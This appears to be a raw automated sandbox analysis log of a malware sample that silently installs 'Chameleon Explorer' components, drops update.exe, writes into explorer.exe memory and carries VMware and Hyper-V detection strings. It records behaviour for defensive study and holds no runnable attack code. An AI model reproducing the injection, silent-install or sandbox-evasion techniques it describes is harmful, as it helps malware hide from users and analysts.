Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,

7_2_0047A500

Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: ChameleonExplorer.exe, 00000012.00000003.443791987.0000000004DF8000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: ChameleonExplorer.exe, 00000009.00000003.337523025.0000000003184000.00000004.00000001.sdmp	Binary or memory string: ..........................VMware, Inc..VMW71.00V.13989454.B64.1906190538.06/19/2019..........B5. H....^.7.IS....VMware, Inc..None.VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7.VMware7,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag...0......W...........-.-.A.............,.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...0......W...........-.-.A.............,.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...(......................................RAM slot #7.RAM slot #7...(......................................RAM slot #8.RAM slot #8...(......................................RAM slot #9.RAM slot #9...(......................................RAM slot #10.RAM slot #10...(......................................RAM slot #11.RAM slot #11...(......................................RAM slot #12.RAM slot #12...( .....................................RAM slot #13.RAM slot #13...(!.....................................RAM slot #14.RAM slot #14...(".....................................RAM slot #15.RAM slot #15...(#.....................................RAM slot #16.RAM slot #16...($.................0
Source: ChameleonExplorer.exe, 0000000F.00000003.379594759.000000000316F000.00000004.00000001.sdmp	Binary or memory string: ..........................VMware, Inc..VMW71.00V.13989454.B64.1906190538.06/19/2019..........B5. H....^.7.IS....VMware, Inc..None.VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7.VMware7,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag...0......W...........-.-.A.............,.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...0......W.........
Source: ChameleonExplorer.exe, 00000012.00000003.427684518.0000000004DB7000.00000004.00000001.sdmp	Binary or memory string: VMware(
Source: ChameleonExplorer.exe, 00000012.00000003.455439361.0000000004E1F000.00000004.00000001.sdmp	Binary or memory string: VMware-42 35 d
Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, 00000001.00000003.315989967.0000000004945000.00000004.00000001.sdmp, ChameleonExplorer.exe, 00000009.00000003.330120718.00000000015F1000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: ChameleonExplorer.exe, 00000012.00000003.383729173.0000000003F31000.00000004.00000001.sdmp	Binary or memory string: e d0 37 a0 49 53 d7VMware7,1
Source: ChameleonExplorer.exe, 0000000F.00000003.380821604.000000000157F000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,2
Source: ChameleonExplorer.exe, 00000012.00000003.443791987.0000000004DF8000.00000004.00000001.sdmp	Binary or memory string: VMware, Inc.NonP
Source: ChameleonExplorer.exe, 00000012.00000003.405917260.0000000004DB6000.00000004.00000001.sdmp	Binary or memory string: aa 5e d0 37 a0 49 53 d7VMware7,1
Source: ChameleonExplorer.exe, 00000012.00000003.429836725.0000000004DBA000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: ChameleonExplorer.exe, 00000009.00000003.329879292.0000000001623000.00000004.00000001.sdmp	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0
Source: ChameleonExplorer.exe, 00000012.00000003.448684995.0000000004E08000.00000004.00000001.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37
Source: ChameleonExplorer.exe, 00000012.00000003.455439361.0000000004E1F000.00000004.00000001.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 35 d
Source: ChameleonExplorer.exe, 00000009.00000003.337512935.000000000317C000.00000004.00000001.sdmp	Binary or memory string: 7VMware, Inc.VMW71.00V.13989454.B64.190619053806/19/2019tform.None.None.......................No Enclosure.N/A.None.No Asset Tag...0......W...........-.-.A.............,.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...0......W...........-.-.A.............,.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...(......................................RAM slot #7.RAM slot #7...(......................................RAM slot #8.RAM slot #8...(......................................RAM slot #9.RAM slot #9...(......................................RAM slot #10.RAM slot #10...(......................................RAM slot #11.RAM slot #11...(......................................RAM slot #12.RAM slot #12...( .....................................RAM slot #13.RAM slot #13...(!.....................................RAM slot #14.RAM slot #14...(".....................................RAM slot #15.RAM slot #15...(#.....................................RAM slot #16.RAM slot #16...($.................
Source: ChameleonExplorer.exe, 00000012.00000003.454641634.0000000004E25000.00000004.00000001.sdmp	Binary or memory string: 8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
Source: ChameleonExplorer.exe, 00000012.00000003.439309184.0000000004DFD000.00000004.00000001.sdmp	Binary or memory string: VMware, Inc.VMW71.00V.13989454.B64.190619053806/19/2019
Source: ChameleonExplorer.exe, 0000000F.00000003.379394902.000000000312A000.00000004.00000001.sdmp	Binary or memory string: 7VMware, Inc.VMW71.00V.13989454.B64.190619053806/19/2019
Source: ChameleonExplorer.exe, 00000012.00000003.443460138.0000000004E06000.00000004.00000001.sdmp	Binary or memory string: 0 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
Source: ChameleonExplorer.exe, 00000012.00000003.457192565.0000000004E26000.00000004.00000001.sdmp	Binary or memory string: VMware,
Source: ChameleonExplorer.exe, 0000000F.00000003.374211863.000000000157F000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
Source: ChameleonExplorer.exe, 00000012.00000003.440680386.0000000004E01000.00000004.00000001.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48
Source: ChameleonExplorer.exe, 00000012.00000003.411677810.0000000004DB5000.00000004.00000001.sdmp	Binary or memory string: VMware, Inc.VM
Source: ChameleonExplorer.exe, 00000012.00000003.439309184.0000000004DFD000.00000004.00000001.sdmp	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: ChameleonExplorer.exe, 00000012.00000003.402658931.0000000001674000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUo
Source: ChameleonExplorer.exe, 00000009.00000003.329835574.0000000001624000.00000004.00000001.sdmp	Binary or memory string: 49 53 d7VMware7,1
Source: ChameleonExplorer.exe, 00000012.00000003.439309184.0000000004DFD000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: ChameleonExplorer.exe, 00000012.00000003.439309184.0000000004DFD000.00000004.00000001.sdmp	Binary or memory string: VMware Virtual RAM
Source: ChameleonExplorer.exe, 00000012.00000003.402658931.0000000001674000.00000004.00000001.sdmp	Binary or memory string: VMware, Inc.VMW71.00V.13989454.B64.19061Ydb
Source: ChameleonExplorer.exe, 00000009.00000003.337512935.000000000317C000.00000004.00000001.sdmp	Binary or memory string: 7VMware, Inc.VMW71.00V.13989454.B64.190619053806/19/2019VMware,
Source: ChameleonExplorer.exe, 00000012.00000003.447432943.0000000004E08000.00000004.00000001.sdmp	Binary or memory string: 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
Source: ChameleonExplorer.exe, 00000012.00000003.406297335.0000000004DB2000.00000004.00000001.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-
Source: ChameleonExplorer.exe, 00000012.00000003.401764768.0000000003FA5000.00000004.00000001.sdmp	Binary or memory string: f-aa 5e d0 37 a0 49 53 d7VMware7,1
Source: ChameleonExplorer.exe, 00000012.00000003.411817955.0000000004DB1000.00000004.00000001.sdmp	Binary or memory string: eVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
Source: ChameleonExplorer.exe, 00000012.00000003.440429825.0000000004E05000.00000004.00000001.sdmp	Binary or memory string: cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
Source: ChameleonExplorer.exe, 00000012.00000003.386122649.00000000015EE000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
Source: ChameleonExplorer.exe, 00000012.00000003.439309184.0000000004DFD000.00000004.00000001.sdmp	Binary or memory string: VMware, Inc.
Source: ChameleonExplorer.exe, 00000012.00000003.401364177.0000000001676000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
Source: ChameleonExplorer.exe, 00000012.00000003.405559878.0000000003FF1000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%
Source: ChameleonExplorer.exe, 00000012.00000003.428501638.0000000004DBA000.00000004.00000001.sdmp	Binary or memory string: VMwareX
Source: ChameleonExplorer.exe, 00000009.00000003.329879292.0000000001623000.00000004.00000001.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0
Source: ChameleonExplorer.exe, 00000012.00000003.439309184.0000000004DFD000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: ChameleonExplorer.exe, 00000012.00000003.429836725.0000000004DBA000.00000004.00000001.sdmp	Binary or memory string: VMware H
Source: ChameleonExplorer.exe, 00000012.00000003.384314475.00000000015E7000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ChameleonExplorer.exe, 00000012.00000003.427288555.0000000004DD4000.00000004.00000001.sdmp	Binary or memory string: VMware]
Source: ChameleonExplorer.exe, 0000000F.00000003.376039819.00000000015AD000.00000004.00000001.sdmp	Binary or memory string: VMware, Inc.VMW71.00V.1398945
Source: ChameleonExplorer.exe, 00000009.00000003.337523025.0000000003184000.00000004.00000001.sdmp	Binary or memory string: ..........................VMware, Inc..VMW71.00V.13989454.B64.1906190538.06/19/2019..........B5. H....^.7.IS....VMware, Inc..None.VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7.VMware7,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag...0......W...........-.-.A.............,.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...0......W...........-.-.A.............,.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...(......................................RAM slot #7.RAM slot #7...(......................................RAM slot #8.RAM slot #8...(......................................RAM slot #9.RAM slot #9...(......................................RAM slot #10.RAM slot #10...(......................................RAM slot #11.RAM slot #11...(......................................RAM slot #12.RAM slot #12...( .....................................RAM slot #13.RAM slot #13...(!.....................................RAM slot #14.RAM slot #14...(".....................................RAM slot #15.RAM slot #15...(#.....................................RAM slot #16.RAM slot #16...($.................
Source: ChameleonExplorer.exe, 00000009.00000003.337512935.000000000317C000.00000004.00000001.sdmp	Binary or memory string: tform.None.None.......................No Enclosure.N/A.None.No Asset Tag...0......W...........-.-.A.............,.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...0......W...........-.-.A.............,.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...(......................................RAM slot #7.RAM slot #7...(......................................RAM slot #8.RAM slot #8...(......................................RAM slot #9.RAM slot #9...(......................................RAM slot #10.RAM slot #10...(......................................RAM slot #11.RAM slot #11...(......................................RAM slot #12.RAM slot #12...( .....................................RAM slot #13.RAM slot #13...(!.....................................RAM slot #14.RAM slot #14...(".....................................RAM slot #15.RAM slot #15...(#.....................................RAM slot #16.RAM slot #16...($.................
Source: ChameleonExplorer.exe, 00000012.00000003.449287871.0000000004E0C000.00000004.00000001.sdmp	Binary or memory string: a0 49 53 d7VMware7,1
Source: ChameleonExplorer.exe, 00000012.00000003.443791987.0000000004DF8000.00000004.00000001.sdmp	Binary or memory string: 9 53 d7VMware7,1
Source: ChameleonExplorer.exe, 00000012.00000003.402658931.0000000001674000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}l
Source: ChameleonExplorer.exe, 00000012.00000003.439309184.0000000004DFD000.00000004.00000001.sdmp	Binary or memory string: VMware7,1
Source: ChameleonExplorer.exe, 00000012.00000003.439309184.0000000004DFD000.00000004.00000001.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: ChameleonExplorer.exe, 00000012.00000003.447527591.0000000004E04000.00000004.00000001.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 35 d8
Source: ChameleonExplorer.exe, 0000000F.00000003.374959861.000000000157F000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`S
Source: ChameleonExplorer.exe, 00000012.00000003.456008534.0000000004E1F000.00000004.00000001.sdmp	Binary or memory string: VMware, Inc.VMW71.00V
Source: ChameleonExplorer.exe, 00000012.00000003.443813978.0000000004E02000.00000004.00000001.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 35 d8 2
Source: ChameleonExplorer.exe, 00000012.00000003.439309184.0000000004DFD000.00000004.00000001.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
Source: ChameleonExplorer.exe, 0000000F.00000003.374633762.00000000015AA000.00000004.00000001.sdmp	Binary or memory string: VMware, Inc

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\cexplorer.exe

Code function: 6_2_00406458 GetSystemInfo,

6_2_00406458

Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_00405BEC GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,	6_2_00405BEC
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004D4F34 FindFirstFileW,FindNextFileW,FindClose,	7_2_004D4F34
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004AD294 FindFirstFileW,GetLastError,	7_2_004AD294
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_00408174 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,	7_2_00408174
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004C0BC0 SetErrorMode,FindFirstFileW,FindNextFileW,FindClose,SetErrorMode,	7_2_004C0BC0
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004C107C SetErrorMode,FindFirstFileW,FindNextFileW,FindClose,SetErrorMode,	7_2_004C107C
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004FDF38 FindFirstFileW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,	7_2_004FDF38
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004BF43C FindFirstFileW,FindNextFileW,FindClose,	7_2_004BF43C
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: 8_2_00413030 FindFirstFileW,FindNextFileW,FindClose,	8_2_00413030
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: 8_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,	8_2_004119A8
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: 8_2_004119AC FindFirstFileW,FindNextFileW,FindClose,	8_2_004119AC
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: 8_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,	8_2_00412D6C
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: 8_2_0041160C FindFirstFileW,FindNextFileW,FindClose,	8_2_0041160C
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: 8_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	8_2_00413F58
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: 8_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	8_2_00413F58
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Code function: 14_2_0340A504 FindFirstFileW,FindClose,	14_2_0340A504
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Code function: 14_2_03409F38 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	14_2_03409F38

Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

Code function: 7_2_004A1A3C LoadLibraryExW,LoadLibraryW,GetProcAddress,

7_2_004A1A3C

Source: C:\Users\user\AppData\Roaming\update.exe

Code function: 8_2_00407AF0 mov eax, dword ptr fs:[00000030h]

8_2_00407AF0

Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe

Process queried: DebugPort

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Memory written: PID: 6748 base: 1C0000 value: B8	Jump to behavior
Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Memory written: PID: 6748 base: 3342D8 value: 00	Jump to behavior
Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Memory written: PID: 6748 base: 3351E8 value: 00	Jump to behavior

Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Process created: C:\Users\user\AppData\Roaming\cexplorer.exe "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-	Jump to behavior
Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Process created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe"	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 590118	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

Code function: 7_2_004D8F68 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,

7_2_004D8F68

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

Code function: 7_2_0047FFEC AllocateAndInitializeSid,GetVersion,GetModuleHandleW,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,

7_2_0047FFEC

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

Code function: 7_2_00480E38 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,

7_2_00480E38

Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, 00000001.00000002.322294826.0000000000495000.00000040.00020000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: ChameleonFolder.exe, 0000000E.00000002.564111167.0000000001260000.00000002.00020000.sdmp, ChameleonFolder64.exe, 00000010.00000002.560274388.0000000000BE0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: ChameleonFolder.exe, ChameleonExplorer.exe, 0000000F.00000002.386332885.0000000003391000.00000020.00020000.sdmp, ChameleonFolder64.exe, 00000010.00000002.560274388.0000000000BE0000.00000002.00020000.sdmp, ChameleonFolder.exe, 00000013.00000002.405244599.0000000000418000.00000020.00020000.sdmp, ChameleonFolder.exe, 00000014.00000002.405046301.0000000000418000.00000020.00020000.sdmp, ChameleonFolder.exe, 00000015.00000002.405593076.0000000002A71000.00000020.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: ChameleonFolder.exe, ChameleonExplorer.exe, 0000000F.00000002.386332885.0000000003391000.00000020.00020000.sdmp, ChameleonFolder64.exe, 00000010.00000002.560274388.0000000000BE0000.00000002.00020000.sdmp, ChameleonFolder.exe, 00000013.00000002.405244599.0000000000418000.00000020.00020000.sdmp, ChameleonFolder.exe, 00000014.00000002.405046301.0000000000418000.00000020.00020000.sdmp	Binary or memory string: Progman
Source: cexplorer.tmp, 00000007.00000003.386932171.0000000004BC0000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000002.363949291.0000000000418000.00000020.00020000.sdmp, ChameleonFolder.exe, 0000000E.00000002.559883973.0000000000418000.00000020.00020000.sdmp, ChameleonFolder.exe, 00000013.00000002.405244599.0000000000418000.00000020.00020000.sdmp, ChameleonFolder.exe, 00000014.00000002.405046301.0000000000418000.00000020.00020000.sdmp	Binary or memory string: GetTaskbarPositionShell_TrayWnd
Source: ChameleonFolder.exe, 0000000E.00000002.564111167.0000000001260000.00000002.00020000.sdmp, ChameleonFolder64.exe, 00000010.00000002.560274388.0000000000BE0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000002.363949291.0000000000418000.00000020.00020000.sdmp, ChameleonFolder.exe, 0000000E.00000002.559883973.0000000000418000.00000020.00020000.sdmp, ChameleonFolder.exe, 00000013.00000002.405244599.0000000000418000.00000020.00020000.sdmp, ChameleonFolder.exe, 00000014.00000002.405046301.0000000000418000.00000020.00020000.sdmp, ChameleonFolder.exe, 00000015.00000002.405593076.0000000002A71000.00000020.00020000.sdmp	Binary or memory string: ProgmanU

Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: GetModuleFileNameW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,lstrcpynW,GetThreadLocale,GetLocaleInfoW,lstrlenW,lstrcpynW,LoadLibraryExW,lstrcpynW,LoadLibraryExW,lstrcpynW,LoadLibraryExW,	6_2_00405DE8
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: GetLocaleInfoW,	6_2_0040E640
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: GetLocaleInfoW,	6_2_00408EB4
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: GetLocaleInfoW,	6_2_00408F00
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: lstrcpynW,GetThreadLocale,GetLocaleInfoW,lstrlenW,lstrcpynW,LoadLibraryExW,lstrcpynW,LoadLibraryExW,lstrcpynW,LoadLibraryExW,	6_2_00405F23
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: GetModuleFileNameW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,lstrcpynW,GetThreadLocale,GetLocaleInfoW,lstrlenW,lstrcpynW,LoadLibraryExW,lstrcpynW,LoadLibraryExW,lstrcpynW,LoadLibraryExW,	7_2_00408370
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: lstrcpynW,GetThreadLocale,GetLocaleInfoW,lstrlenW,lstrcpynW,LoadLibraryExW,lstrcpynW,LoadLibraryExW,lstrcpynW,LoadLibraryExW,	7_2_004084AB
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: GetLocaleInfoW,	7_2_004B0DAC
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: GetLocaleInfoW,	7_2_00410FC0
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: GetLocaleInfoW,	7_2_00410FBE
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: GetLocaleInfoW,	7_2_0041100C
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: GetLocaleInfoA,	8_2_00404BA8
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	14_2_0340A63C
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	14_2_03409ADC
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Code function: GetLocaleInfoW,	14_2_0341A948
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Code function: GetLocaleInfoW,	14_2_0341A8FC

